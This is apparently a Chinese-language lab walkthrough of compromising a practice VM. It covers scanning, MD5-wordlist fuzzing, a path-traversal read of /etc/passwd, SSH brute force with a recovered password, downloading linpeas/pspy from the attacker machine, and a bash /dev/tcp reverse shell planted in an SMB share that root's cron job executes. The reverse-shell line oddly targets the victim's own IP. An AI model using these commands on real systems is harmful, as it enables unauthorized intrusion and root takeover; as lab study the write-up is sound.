kali攻击机ip:192.168.56.107
主机发现
arp-scan -I eth0 -l
端口全扫描
nmap -sS -p- -A 192.168.56.110
发现很常规的开放了22,80端口
web服务器为apache 2.4.38版本
我尝试searchspolit和查找cve,都没有发现可利用的漏洞
发现一张图片,暂时没发现有什么特别的
目录探测
还是常规的扫一波目录
dirb http://192.168.56.110
一无所获
加上后缀扫
dirb http://192.168.56.110 -X .txt,.php,.zip
依旧一无所获
把页面图片都下载下来使用记事本查看源码
又双叒没发现 =_=
不信邪,回去再看看图片,这么大一个图片放着肯定有它的用意,不在源码,那就是图片本身了
放大观察,终于被我发现了地图上有md加五个X,说不定就是md5
md5字典爆破
这段代码摘自别的博主,因为我不会写=_=
for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dir.txt; done
cat dir.txt
发现字典后面跟着无关的两个空格一个"-",需要手动删除
在vmware中点击文件,使用mousepad
打开文件,点击图标中倒数第二个,查找并替换多余字符
使用ffuf再次探测目录
ffuf -w ./dir.txt -u http://192.168.56.110/FUZZ -e .txt,.php -mc 200
发现.php文件
f66b22bf020334b04c7d0d3eb5010391.php
咦,啥也没有
源码也是空的
只能再看看是不是存在LFI
继续使用md5字典模糊测试,没有结果
因为这台kali是新弄的,没有下载字典,那就先尝试kali自带字典扫描
使用common.txt没结果
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.56.110/f66b22bf020334b04c7d0d3eb5010391.php/?FUZZ=../../../../etc/passwd -fw 1
改用big
ffuf -w /usr/share/wordlists/dirb/big.txt -u http://192.168.56.110/f66b22bf020334b04c7d0d3eb5010391.php/?FUZZ=../../../../etc/passwd -fw 1
有了!差点想去下载字典了
purpose
http://192.168.56.110/f66b22bf020334b04c7d0d3eb5010391.php/?purpose=../../../../etc/passwd
这个freddie的主目录在/home下,很有可能就是ssh远程登录的用户
没有密码提示,那就再试试md5字典爆破
hydra -l freddie -P dir.txt 192.168.56.110 ssh
61a4e3e60c063d1e472dd780f64e6cad
ssh远程连接
ssh freddie@192.168.56.110
用户目录下发现flag
papy64和linpeas.sh下载
papy64下载地址
GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions
linpeas.sh下载地址
GitHub - carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
直接上传linpeas.sh和pspy64
kali攻击机开启htttp服务
python -m http.server 80
wget http://192.168.56.107/linpeas.sh
wget http://192.168.56.107/pspy64
赋予执行权限
chmod 777 linpeas.sh
chmod 777 pspy64
./linpeas.sh
没有找到有用信息,那就执行pspy64看看有没有定时任务
./pspy64
等待一会,发现uid=0的用户,也就是root,隔一会就会重复执行bash /smbshare/*
,也就是/smbshare目录下的所有文件
可以访问/smbshare,而且该目录是空的
提权
既然如此,我们可以上传一个bash反弹shell到该目录,然后等待文件定时执行(不会使用vi,只能上传了)
#!/bin/bash
bash -i >& /dev/tcp/192.168.56.110/8888 0>&1
wget http://192.168.56.107:8888/shell.sh
无法直接写入shell.sh
想了想,这个目录名为/smbshare,或许跟445端口的smb服务有关
没有netstat命令,但还能使用ss
ss -lntp
可以看出开放了445端口,不知道为啥刚刚linpeas.sh没有扫出来
我还回去看了一遍,是真的没有,真不是我瞎
使用smbclient查看smb共享服务
smbclient -L 127.0.0.1
发现grotesque目录
上传shell.sh
cd ~
wget http://192.168.56.107:8888/shell.sh
chmod 777 shell.sh
像ftp一样使用smbclient
smbclient -N //127.0.0.1/grotesque
put shell.sh
发现确实上传至/smbshare目录下了
kali开启监听
nc -lvp 8888
接下来就是等待root执行定时任务了
不想干等着,再次运行pspy64,发现已执行了shell.sh
回到nc界面,确实得到了反弹shell,而且是root权限的
得到flag
o了 😃